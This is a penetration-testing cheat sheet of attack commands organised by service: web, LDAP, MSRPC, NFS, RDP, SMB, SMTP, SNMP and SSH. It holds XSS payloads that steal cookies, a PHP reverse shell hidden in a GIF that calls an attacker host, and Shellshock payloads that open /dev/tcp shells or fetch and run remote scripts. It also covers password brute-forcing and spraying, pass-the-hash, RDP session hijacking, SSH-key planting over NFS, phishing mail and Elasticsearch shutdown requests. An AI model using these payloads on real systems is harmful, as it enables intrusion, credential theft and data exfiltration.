        }

    `` Cookies

        <img src="error.jpg" onerror="eval('new Image().src=\"http://VAR_TARGET_HOST:8000/\"+ document.cookie;')">

        <script>new Image().src="http://VAR_TARGET_HOST:8888/?o="+document.cookie;</script>

        >>> s = 'new Image().src=\"http://VAR_TARGET_HOST:8000/\"+ document.cookie;'
        >>> PAYLOAD = [ord(c) for c in s]
        <img src="error.jpg" onerror="eval(String.fromCharCode(PAYLOAD))">

        <script>new Image().src="http://VAR_TARGET_HOST/?o="+document.cookie;</script>

    `` Images

        `` GIF

            GIF98 <?php echo shell_exec("rm /tmp/.kernel;mkfifo /tmp/.kernel;cat /tmp/.kernel|/bin/sh -i 2>&1|nc VAR_ATTACKER_HOST 8000 >/tmp/.kernel"); ?>

        `` JPEG

            ~$ echo 'FFD8FFDB' | xxd -r -p > test.jpg
            ~$ echo '<?php phpinfo(); ?>' >> test.jpg

`` Paths

    - /etc/httpd/logs/access.log
    - /etc/httpd/logs/access_log
    - /etc/httpd/logs/error.log
    - /etc/httpd/logs/error_log
    - /usr/local/apache/logs/access.log
    - /usr/local/apache/logs/access_log
    - /usr/local/apache/logs/error.log
    - /usr/local/apache/logs/error_log
    - /var/log/access.log
    - /var/log/access_log
    - /var/log/apache/access.log
    - /var/log/apache/access_log
    - /var/log/apache/error.log
    - /var/log/apache/error_log
    - /var/log/apache2/access.log
    - /var/log/apache2/access_log
    - /var/log/apache2/error.log
    - /var/log/apache2/error_log
    - /var/log/error.log
    - /var/log/error_log
    - /var/www/logs/access.log
    - /var/www/logs/access_log
    - /var/www/logs/error.log
    - /var/www/logs/error_log
    - /var/log/auth.log
    - /var/log/cron.log
    - /var/log/httpd/access_log
    - /var/log/httpd/error_log
    - /var/log/messages
    - /var/log/secure
    - /var/www/config.php
    - /var/www/configuration.php
    - /var/www/configuration.php
    - /var/www/html/inc/header.inc.php
    - /var/www/html/sites/default/settings.php
    - /var/www/html/wp-config.php

`` Shellshock

    `` Tools

        ~$ nmap VAR_TARGET_HOST -p VAR_TARGET_PORT --script http-shellshock --script-args uri=/cgi-bin/test.cgi
        ~$ wfuzz -H "User-Agent: () { :;}; echo; echo vulnerable" --ss vulnerable -w VAR_WORDLIST http://VAR_TARGET_HOST/FUZZ

    `` Test

        GET /cgi-bin/script.cgi HTTP/1.1
        () { :;}; echo; echo "VAR_STRING_1": () { :;}; echo; echo "VAR_STRING_2"
        Host: VAR_TARGET_HOST
        Connection: close
        Cookie: () { :;}; echo; echo "VAR_STRING_3"
        User-Agent: () { :;}; echo; echo "VAR_STRING_4"
        Referer: () { :;}; echo; echo "VAR_STRING_5"

    `` Samples

        Referer: () { :;}; echo "XXX"; /bin/bash -c "exec /bin/sh 0</dev/tcp/VAR_TARGET_HOST/443 1>&0 2>&0 &"
        x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
        x: () { :;}; echo "Hacked" > /var/www/hacked.html
        env ENV_VAR_FN='() { <your function> }; <attacker code here>'
        User-agent: () { :;}; echo something>/var/www/html/new_file
        () { :;}; /bin/bash -c \"whoami | mail -s 'VAR_TARGET_HOST l' xxxxxxxxxxxxxxxx@gmail.com
        () {:;}; ping -c 1 -p VAR_HEX VAR_ATTACKER_HOST
        () {:;}; /usr/bin/wget http://VAR_ATTACKER_HOST/VAR_HEX >> `null
        () { :;}; /bin/bash -c \"cd /tmp;wget http://VAR_TARGET_HOST/ji;curl -O /tmp/ji http://VAR_TARGET_HOST/ji ; perl /tmp/ji;rm -rf /tmp/ji\"
        () { :;}; /bin/bash -c \"/usr/bin/env curl -s http://VAR_TARGET_HOST/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\"
        Whatever-Here: () { :;}; echo "XXX"; /bin/bash -c "exec /bin/sh 0</dev/tcp/VAR_TARGET_HOST/VAR_TARGET_PORT 1>&0 2>&0 &"

`` curl

    ~$ curl -v -X TRACE VAR_TARGET_HOST
    ~$ curl --user 'VAR_USERNAME:VAR_PASSWORD' 'https://VAR_TARGET_HOST'
    ~$ curl --verbose --header 'Host: VAR_TARGET_HOST' 'http://VAR_TARGET_HOST/'
    ~$ curl -v -X OPTIONS http://VAR_TARGET_HOST
    ~$ curl VAR_TARGET_HOST -s -L | html2text -width '99' | uniq
    ~$ curl -X POST -H "Content-Type: application/json" -d @data.json http://VAR_TARGET_HOST/script.php
    ~$ curl -X POST -H "Content-Type: application/json" -d 'VAR_STRING' http://VAR_TARGET_HOST/script.php
    ~$ curl "http://VAR_TARGET_HOST/sync?opt=' /usr/bin/whi[c]h mk\nod'"
    ~$ curl "http://VAR_TARGET_HOST/sync?opt=' p\s aux'"
    ~$ curl "http://VAR_TARGET_HOST/sync?opt=' c\at /usr/local/ope\nresty/nginx/conf/nginx.conf'" > nginx.conf
    ~$ curl -s VAR_TARGET_HOST/users/{1..20}.json

`` WebDAV

    `` Tools

        ~$ davtest -url http://VAR_TARGET_HOST

    `` curl

        ~$ curl -v -X PUT -d @test.txt http://VAR_TARGET_HOST/test.txt
        ~$ curl -v -X PUT -d '<% out.println("hello");%>' http://VAR_TARGET_HOST/test.jsp
        ~$ curl -v -X MOVE --header 'Destination:http://VAR_TARGET_HOST/new.txt' 'http://VAR_TARGET_HOST/old.txt'
        ~$ curl -v -X DELETE http://VAR_TARGET_HOST:8585/uploads/verify.txt
        ~$ curl -X MKCOL 'https://VAR_TARGET_HOST/new_folder'
        ~$ curl -u VAR_USERNAME:VAR_PASSWORD -X MKCOL 'http://VAR_TARGET_HOST/webdav/test/'

`` ElasticSearch

    ~$ curl -X GET http://VAR_TARGET_HOST:9200/_cat/indices?v
    ~$ curl -X GET http://VAR_TARGET_HOST:9200/VAR_STRING/_search
    ~$ curl -X POST http://VAR_TARGET_HOST:9200/_shutdown
    ~$ curl -X POST http://VAR_TARGET_HOST:9200/_cluster/nodes/_master/_shutdown

`` Logstash

    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/jvm?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/pipelines?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/os?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/plugins?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/hot_threads?human=true'

    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/jvm?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/process?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/events?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/pipelines?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/reloads?pretty'
    ~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/os?pretty'


`` Password Bruteforcing

    `` POST

        ~$ hydra VAR_TARGET_HOST http-post-form -V -t 2 -w 30 -f -L usernames.txt -P passwords.txt "/admin_loginok.html:username=^USER^&password=^PASS^&username_val=^USER^&password_val=^PASS^&submit_btn=+Login+:Login failed"
        ~$ ffuf -w VAR_WORDLIST -X POST -d "username=admin\&password=FUZZ" -u https://VAR_TARGET_HOST/script.php -fc 401

    `` GET with cookie

        ~$ hydra VAR_TARGET_HOST http-get-form -V -t 2 -l VAR_USERNAME -P VAR_WORDLIST "/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low;PHPSESSID=VAR_STRING"

    `` Non-standard port

        ~$ hydra VAR_TARGET_HOST http-post-form -I -d -V -t 1 -w 80 -c 1 -W 3 -s 5466 -f -L usernames.txt -e nsr "/admin_loginok.html:username=^USER^&password=^PASS^&username_val=^USER^&password_val=^PASS^&submit_btn=+Login+:failed:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64; rv\:52.0) Gecko/20100101 Firefox/52.0:C="

    `` Proxied

        ~$ env HYDRA_PROXY_HTTP=http://localhost:8080 hydra VAR_TARGET_HOST http-post-form -V -t 2 -s 5466 -f -L usernames.txt -P passwords.txt "/admin_loginok.html:username=^USER^&password=^PASS^&username_val=^USER^&password_val=^PASS^&submit_btn=+Login+:Login failed"

        ~$ proxychains4 -q curl -sv --cookie "username=VAR_USERNAME; password=VAR_PASSWORD" --data "user=%00<?system('ls -la'); die();?>" "http://VAR_TARGET_HOST/script.php" | html2text

    `` Wordpress

        ~$ hydra VAR_TARGET_HOST -V http-form-post -L usernames.txt -P passwords.txt '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

    `` Tomcat

        ~$ ~/lib/pentesting-cookbook/tomcat_brute.py -u VAR_TARGET_URL

`` WebRTC local IP discovery

    `` Simplified

        // Normalise the vendor-prefixed constructors onto window.RTCPeerConnection,
        // then open a peer connection with no ICE servers and log the first
        // address found in a gathered ICE candidate.
        window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
        var noop = function(){};
        var pc = new RTCPeerConnection({iceServers:[]});
        pc.createDataChannel("");
        pc.createOffer(pc.setLocalDescription.bind(pc), noop);
        pc.onicecandidate = function(event){
            var cand = event && event.candidate && event.candidate.candidate;
            if (!cand) { return; }
            // IPv4 dotted quad or full 8-group IPv6 literal.
            // NOTE(review): exec() returns null when the candidate carries no
            // such literal, in which case the [1] access throws.
            var ipPattern = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/;
            console.log('Local IP: ', ipPattern.exec(cand)[1]);
            // Only the first candidate is reported; detach the handler afterwards.
            pc.onicecandidate = noop;
        };

    `` Over STUN request

        -- Source: https://github.com/diafygi/webrtc-ips

        // <iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
        // <script>getIPs(function(ip){console.log(ip);});

        // Gathers ICE candidates through a STUN-backed peer connection and invokes
        // callback(ip) once for every distinct address literal seen, both from the
        // onicecandidate events and from a one-second-later parse of the local SDP.
        // Relies on a global `iframe` element (see the markup above) as a fallback
        // source of the RTCPeerConnection constructor.
        function getIPs(callback){
            var seen = {};
            var PeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
            var useWebKit = !!window.webkitRTCPeerConnection;  // computed but not consulted
            if (!PeerConnection) {
                var frameWin = iframe.contentWindow;
                PeerConnection = frameWin.RTCPeerConnection || frameWin.mozRTCPeerConnection || frameWin.webkitRTCPeerConnection;
                useWebKit = !!frameWin.webkitRTCPeerConnection;
            }
            // IPv4 dotted quad or full 8-group IPv6 literal.
            // NOTE(review): exec() yields null when a candidate carries no such
            // literal, so the [1] access below throws in that case.
            var ipPattern = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/;
            function report(candidate){
                var addr = ipPattern.exec(candidate)[1];
                if (seen[addr] === undefined) {
                    callback(addr);
                }
                seen[addr] = true;
            }
            var pc = new PeerConnection(
                {iceServers: [{urls: "stun:stun.services.mozilla.com"}]},
                {optional: [{RtpDataChannels: true}]}
            );
            pc.onicecandidate = function(event){
                if (event.candidate) {
                    report(event.candidate.candidate);
                }
            };
            pc.createDataChannel("");
            pc.createOffer(function(offer){
                pc.setLocalDescription(offer, function(){}, function(){});
            }, function(){});
            // Second pass over the negotiated SDP, for candidates that never
            // surfaced through onicecandidate.
            setTimeout(function(){
                pc.localDescription.sdp.split('\n').forEach(function(line){
                    if (line.indexOf('a=candidate:') === 0) {
                        report(line);
                    }
                });
            }, 1000);
        }

`` Popular MIME Types

    - application/excel
    - application/javascript
    - application/msword
    - application/octet-stream
    - application/pdf
    - application/powerpoint
    - application/vnd.ms-excel
    - application/vnd.ms-powerpoint
    - image/bmp
    - image/gif
    - image/jpeg
    - image/png
    - text/javascript
    - text/plain

`` Popular User-Agent strings

    -- Based on https://developers.whatismybrowser.com/useragents/explore/software_type_specific/web-browser/1

    `` Windows

        `` Chrome

            -- ver. 74
            - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36

            -- ver. 98
            - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36

        `` Internet Explorer

            -- ver. 6
            - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
            - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
            - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

            -- ver. 7
            - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

            -- ver. 9
            - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; KTXN)
            - Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

            -- ver. 11
            - Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

        `` Edge

            -- ver. 44
            - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763

            -- ver. 96
            - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62

    `` Linux

        `` Chrome

            -- ver. 44
            - Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

`` Mirroring

    `` Relatively peaceful, capturing *.war only

        -- quote the accept pattern, otherwise the shell glob-expands '*.war' locally before wget sees it
        ~$ wget --convert-links --no-parent -m -e robots=off -r -A '*.war' --limit-rate=250k -w2 http://VAR_TARGET_HOST:8080/repository


================================================
FILE: Target.Host.Service.IDENT.txt
================================================
`` User enumeration

    -- auth-owners can only resolve owners of ports that are open in the same scan; add the ports of interest next to 113
    ~$ nmap -n -v -p 113,VAR_TARGET_PORTS --script auth-owners VAR_TARGET_HOST

================================================
FILE: Target.Host.Service.LDAP.txt
================================================
`` Scanning

    `` Anonymous

        ~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -b "dc=VAR_DOMAIN,dc=com"
        -- -h/-p are deprecated in OpenLDAP clients in favour of the URI form:
        ~$ ldapsearch -H ldap://VAR_TARGET_HOST:389 -x -b "dc=VAR_DOMAIN,dc=com"
        -- GUI alternative: LDAP Explorer Tool 2

    `` Authenticated

        -- the default AD container is CN=Users (plural); -W prompts for the password instead of leaving it in shell history
        ~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -D "CN=Administrator,CN=Users,DC=VAR_DOMAIN,DC=com" -b "DC=VAR_DOMAIN,DC=com" -W


================================================
FILE: Target.Host.Service.MSRPC.txt
================================================
`` Scanning

    ~$ nmap -n -v -sV -Pn -p135 --script msrpc-enum --script-args vulns.showall VAR_TARGET_HOST

`` Connect

    ~$ rpcclient -U VAR_TARGET_DOMAIN/VAR_USERNAME VAR_TARGET_HOST

`` Version of the target Windows machine

    rpcclient $> srvinfo

`` Specific user / computer information by RID

    rpcclient $> queryuser VAR_RID

`` Domain

    rpcclient $> querydominfo

`` Domain users, groups, shares, privileges

    rpcclient $> enumdomusers
    rpcclient $> enumdomgroups
    rpcclient $> querygroup VAR_RID
    rpcclient $> querygroupmem VAR_RID
    rpcclient $> queryuser VAR_RID
    rpcclient $> netshareenum
    rpcclient $> netshareenumall
    rpcclient $> enumprivs

`` Reset domain user password

    -- Destructive and not reversible: the old password cannot be restored and the user is locked out of their own account;
    -- requires reset/ForceChangePassword rights over the target account and explicit client approval before use
    rpcclient $> setuserinfo2 VAR_USERNAME 23 'VAR_PASSWORD'

    ~$ net rpc password administrator -U VAR_USERNAME -S VAR_TARGET_HOST

`` Check domain password policy

    rpcclient $> getdompwinfo
    rpcclient $> getusrdompwinfo VAR_RID

`` Password spraying

    ~$ rpcclient -U "VAR_USERNAME%VAR_PASSWORD" -c "getusername;quit" VAR_TARGET_HOST

    -- Snippet

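    # One password against every user in domain-users.txt.
    # Check the lockout policy first (rpcclient $> getdompwinfo) and keep the number of
    # attempts per user per observation window below the lockout threshold.
    VAR_PASSWORD=Passw0rd
    VAR_TARGET_HOST=10.0.0.1
    # Samba's -U separates user and password with '%', not ':' - with ':' the whole
    # string is taken as the username and nothing ever authenticates.
    while IFS= read -r user; do
        [ -z "$user" ] && continue
        echo -n "$user:$VAR_PASSWORD "
        rpcclient -U "$user%$VAR_PASSWORD" -c "getusername;quit" "$VAR_TARGET_HOST"
    done < domain-users.txt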


================================================
FILE: Target.Host.Service.NFS.txt
================================================
`` Scanning for accessible exports

    ~$ nmap -v -n -p 111 --script nfs-ls VAR_TARGET_NETWORK

`` General

    ~$ showmount -e VAR_TARGET_HOST

`` Mounting

    `` Anonymous

        ~$ mount -t nfs VAR_TARGET_HOST:/secret /tmp/remote_dir

    `` NFS #1

        -- writing into root's home only works when the export has no_root_squash; with root_squash the write is done as
        -- nobody and fails. Confirm the mount succeeded (mount | grep /mnt/share) before appending the key.
        ~$ mount -t nfs VAR_TARGET_HOST:/secret /mnt/share/
        ~$ cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys
        ~$ umount /mnt/share
        ~$ ssh root@VAR_TARGET_HOST

    `` NFS #2

        ~$ cat /etc/exports
        ~$ mkdir /tmp/.tmp
        ~$ mount -t nfs VAR_TARGET_HOST:/tmp /tmp/.tmp
        ~$ ls -lah /tmp/.tmp
        -- build for the target's architecture and link statically so the binary does not depend on the target's libc;
        -- chown/chmod must run as root on the attacker side and only take effect if the export has no_root_squash
        ~$ gcc -static -o /tmp/.tmp/shell shell.c
        ~$ sudo chown root:root /tmp/.tmp/shell
        ~$ sudo chmod +s /tmp/.tmp/shell

    `` I/O Error?

        ~$ mount -t nfs -o nfsvers=2 VAR_TARGET_HOST:/secret /tmp/remote_dir

================================================
FILE: Target.Host.Service.POP3.txt
================================================
`` Password Bruteforcing

    ~$ nmap -n -v -p 995 --script pop3-brute --script-args=vulns.showall VAR_TARGET_HOST
    ~$ hydra -I -l VAR_USERNAME -e nsr -P VAR_WORDLIST_PASSWORD -f -V pop3://VAR_TARGET_HOST
    ~$ hydra -I -C VAR_WORDLIST_COMBO -e nsr -t 10 -V pop3://VAR_TARGET_HOST


================================================
FILE: Target.Host.Service.RDP.txt
================================================
`` Scanning

    ~$ nmap --script rdp-enum-encryption,rdp-ntlm-info VAR_TARGET_HOST

`` Connection

    ~$ rdesktop -u guest -p guest VAR_TARGET_HOST -g 85%
    -- -r disk: exposes the attacker-side directory read/write to everything running in the remote session; share a
    -- dedicated scratch directory rather than /root
    ~$ rdesktop -u VAR_USERNAME -p VAR_PASSWORD -g 85% -r disk:share=VAR_LOCAL_DIR VAR_TARGET_HOST

`` PTH

    -- Relies on Restricted Admin mode (Windows 8.1 / 2012 R2 and later) being enabled on the target
    -- (HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0); otherwise the hash is rejected
    ~$ xfreerdp /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST

`` Password Bruteforcing

    -- every RDP attempt counts against the account lockout policy; check it first (rpcclient $> getdompwinfo) and keep -t at 1
    ~$ hydra -V -t 1 -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD rdp://VAR_TARGET_HOST
    ~$ ncrack -vv --pairwise -U ../usernames.txt -P ../passwords.txt -f --stealthy-linear rdp://VAR_TARGET_HOST

`` Hijacking disconnected sessions

    `` Using service

        -- needs local admin; the service runs as SYSTEM, which is what lets tscon attach a session without its password
        ~> query user
        -- grab the ID of the disconnected session to take over and the name of your own session (e.g. rdp-tcp#1)
        ~> sc.exe create VAR_STRING binpath= "cmd.exe /k tscon VAR_SESSION_ID /dest:VAR_SESSION_NAME" type= own
        ~> sc.exe start VAR_STRING
        ~> sc.exe delete VAR_STRING

    `` Using mimikatz

        ~> mimikatz
        mimikatz # ts::sessions
        mimikatz # privilege::debug
        mimikatz # token::elevate
        mimikatz # ts::remote /id:2


================================================
FILE: Target.Host.Service.RPC.txt
================================================
`` Scanning

    ~$ rpcinfo -p VAR_TARGET_HOST
    ~$ nmap --script rpcinfo --script-args=unsafe=1 -p VAR_TARGET_PORT VAR_TARGET_HOST
    ~$ nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p VAR_TARGET_PORT VAR_TARGET_HOST


================================================
FILE: Target.Host.Service.SMB.txt
================================================
`` Check remote target access

    ~> net use \\VAR_TARGET_HOST\C$
    ~> dir \\VAR_TARGET_HOST\C$

`` Enumeration

    -- NetBIOS information
    ~$ nbtscan -vh VAR_TARGET_HOST

    -- Version if anything else fails
    ~$ smbver.sh

    -- Check for permissions first
    ~$ smbmap -H VAR_TARGET_HOST

    -- Anything more?
    ~$ enum4linux -a VAR_TARGET_HOST

    -- Null session allowed?
    ~$ smbclient -N -L VAR_TARGET_HOST
    ~> net use \\VAR_TARGET_HOST\IPC$ "" /u:""

    -- Passwordless admin?
    ~$ smbclient //VAR_TARGET_HOST/ipc$ -U Administrator

`` Vulnerability scanning

    -- pass all script arguments in a single --script-args (a repeated flag replaces the earlier one); unsafe=1 enables
    -- checks that can crash the target service (e.g. smb-vuln-ms10-054), so leave it out on production hosts
    ~$ nmap -v -n -p 139,445 -sS -g 53 --script=smb-double-pulsar-backdoor,"smb-enum-*",smb-ls,smb-mbenum,smb-enum-users,smb-os-discovery,smb-print-text,smb-psexec,smb-security-mode,smb-server-stats,"smb-vuln-*","smb2-*" --script-args=vulns.showall,unsafe=1 VAR_TARGET_HOST

`` Shares listing

    ~> net view \\VAR_TARGET_HOST /all
    ~$ smbmap -u VAR_USERNAME -p VAR_PASSWORD -H VAR_TARGET_HOST
    ~$ nmap --script smb-enum-shares -p139,445 -v -n --open VAR_TARGET_HOST
    -- quote the UNC path (or use //VAR_DOMAIN/SYSVOL); unquoted, the shell strips the backslashes
    ~$ smbclient -U "VAR_USERNAME%VAR_PASSWORD" '\\VAR_DOMAIN\SYSVOL'

`` Share mount

    -- vers=2.0 forces SMBv2; a password on the command line ends up in shell history and `ps`, so prefer a
    -- credentials file (username=/password=/domain= lines, mode 0600)
    ~$ mount -t cifs //VAR_TARGET_HOST/share /mnt/tmp -o username=VAR_TARGET_DOMAIN/VAR_USERNAME,password=VAR_PASSWORD,vers=2.0
    ~$ mount -t cifs //VAR_TARGET_HOST/share /mnt/tmp -o credentials=VAR_FILE,vers=2.0

`` Various

    ~$ nbtscan -r VAR_TARGET_HOST
    ~$ smbclient //VAR_TARGET_HOST/ipc$
    ~$ smbclient //VAR_TARGET_HOST/admin$
    ~$ smbclient -W VAR_TARGET_DOMAIN -U user -L VAR_TARGET_HOST
    ~$ proxychains smbclient '//VAR_TARGET_HOST/C$' -U 'VAR_TARGET_DOMAIN/VAR_USERNAME%VAR_PASSWORD'

`` Recursive download

    ~$ smbclient -N //VAR_TARGET_HOST/C$
    smb: \> mask ""
    smb: \> prompt
    smb: \> recurse
    smb: \> mget Users


================================================
FILE: Target.Host.Service.SMTP.txt
================================================
`` Scanning

    ~$ nmap --script smtp-commands,smtp-enum-users -vv -sV -Pn -p 25 VAR_TARGET_HOST

`` Testing

    ~$ swaks --to user@VAR_TARGET_HOST --from user@example.com --server VAR_TARGET_HOST:25 --body "Some text" --header "Subject: Important"

`` Password Bruteforcing

    -- hydra needs a login to try the passwords against: -l VAR_USERNAME or -L VAR_WORDLIST_USERNAME
    ~$ hydra -I -l VAR_USERNAME -P VAR_WORDLIST -V smtp://VAR_TARGET_HOST

`` User enumeration

    ~$ nc -nv VAR_TARGET_HOST 25
    VRFY VAR_USERNAME

    ~$ smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t VAR_TARGET_HOST

    ~$ hydra smtp-enum://VAR_TARGET_HOST/vrfy -l VAR_USERNAME -p localhost

`` Phishing with swaks (HTML template)

    swaks --from sender@example.com --h-From: '=?utf-8?B?VAR_BASE64_VALUE?= <sender@example.com>' --to receiver@example.com,bcc@example.com --h-To: '"ASCII without encoding" <receiver@example.com>' --server VAR_TARGET_HOST:25 --attach-type "text/html;charset=utf-8" --attach-body body.html --header "Subject: =?utf-8?B?VAR_BASE64_VALUE?=" --attach-type "image/png" --attach logo.png

================================================
FILE: Target.Host.Service.SNMP.txt
================================================
`` Scanning

    `` Network discovery

        ~$ nmap -sU -sV -p 161 VAR_TARGET_RANGE
        ~$ onesixtyone -s -o VAR_FILENAME VAR_TARGET_CIDR
        ~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt VAR_TARGET_HOST
        ~$ hydra -P /usr/share/seclists/Discovery/SNMP/snmp.txt -V VAR_TARGET_HOST snmp

    `` Basic

        ~$ nmap -v -sV -Pn -sU -p 161,162 --script snmp-info,snmp-interfaces,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users VAR_TARGET_HOST

    `` Extended

        ~$ python ./snmpbrute.py -t VAR_TARGET_HOST -f /usr/share/seclists/Discovery/SNMP/snmp.txt
        ~$ xprobe2 -v -p udp:161:open VAR_TARGET_HOST
        ~$ snmp-check VAR_TARGET_HOST -c public

    `` FTP Bounce scanning

        ~$ nmap VAR_TARGET_HOST -b VAR_FTP_HOST -Pn -n -g 88 -v -sU -p 161,162 --script snmp-netstat,snmp-processes

    `` Network range

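        #!/bin/bash
        # For every host in ip_list.txt, try each community string in turn until snmpwalk
        # succeeds; the walk is saved to <ip>.snmpwalk and the string that worked to
        # <ip>.community so it does not have to be rediscovered later.
        # Only SNMPv1 read access is tested. onesixtyone (above) covers ranges much faster;
        # this is for when only net-snmp is available.
        while IFS= read -r ip; do
            [ -z "$ip" ] && continue
            echo "$ip"
            while IFS= read -r str; do
                [ -z "$str" ] && continue
                if snmpwalk -OsS -v 1 -c "$str" "$ip" > "$ip.snmpwalk" 2>/dev/null; then
                    echo "$str" > "$ip.community"
                    break
                fi
                # failed attempt: do not leave an empty output file behind
                rm -f "$ip.snmpwalk"
            done < /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings_onesixtyone.txt
        done < ip_list.txt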

`` Table

    - 1.3.6.1.2.1.25.1.6.0 - System Processes
    - 1.3.6.1.2.1.25.2.3.1.4 - Storage Units
    - 1.3.6.1.2.1.25.4.2.1.2 - Running Programs
    - 1.3.6.1.2.1.25.4.2.1.4 - Processes Path
    - 1.3.6.1.2.1.25.6.3.1.2 - Software Name
    - 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports
    - 1.3.6.1.4.1.77.1.2.25 - User Accounts

`` Community strings

    - /usr/share/wordlists/fasttrack.txt

`` Community string bruteforcing

    ~$ nmap -sU VAR_TARGET_HOST -p 161 --script snmp-brute -Pn --script-args snmp-brute.communitiesdb=/usr/share/wordlists/fasttrack.txt
    ~$ onesixtyone -c /usr/share/wordlists/dirb/small.txt VAR_TARGET_HOST

    ~$ for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt);do snmpwalk -v 1 -c $i VAR_TARGET_HOST;done| grep -v "Timeout"

    ~$ echo public > community-strings.txt
    ~$ echo private >> community-strings.txt
    ~$ echo manager >> community-strings.txt
    ~$ for ip in $(seq 1 254);do echo VAR_TARGET_HOST_BASE.$ip;done > ips
    ~$ onesixtyone -c community-strings.txt -i ips

    ~$ hydra -P password-file.txt -V VAR_TARGET_HOST snmp

`` Community string checks

    ~$ snmp-check VAR_TARGET_HOST -c public
    ~$ snmpget -v 1 -c public VAR_TARGET_HOST
    ~$ snmpwalk -v 1 -c public VAR_TARGET_HOST
    ~$ snmpbulkwalk -v2c -c public -Cn0 -Cr10 VAR_TARGET_HOST

    `` Windows users

        ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.4.1.77.1.2.25

    `` Running processes

        ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.25.4.2.1.2

    `` Open TCP ports

        ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.6.13.1.3

    `` Installed software

        ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.25.6.3.1.2

    `` Shares

        ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.4.1.77.1.2.3.1.1

`` Password Bruteforcing

    ~$ hydra -P VAR_WORDLIST -V VAR_TARGET_HOST snmp


================================================
FILE: Target.Host.Service.SSH.txt
================================================
`` Scanning

    ~$ nmap -p 22 --script ssh-enum-algos,ssh-auth-methods,ssh-hostkey,ssh-publickey-acceptance,ssh-run VAR_TARGET_HOST

`` Generate public key from private

    ~$ ssh-keygen -f id_rsa -y > id_rsa.pub

`` Password Bruteforcing

    -- Verbose (-V), ignore previous results (-I), stop once a valid pair is found (-f per host, -F for the whole run when using -M)

    -- Default port
    ~$ hydra -V -I -F -L VAR_WORDLIST_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST

    -- Maximum wait 80, wait between 3, wait 1 per login attempt
    ~$ hydra -V -I -F -t 1 -w 80 -c 1 -W 3 -f -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST

    -- Use single username and non-default port
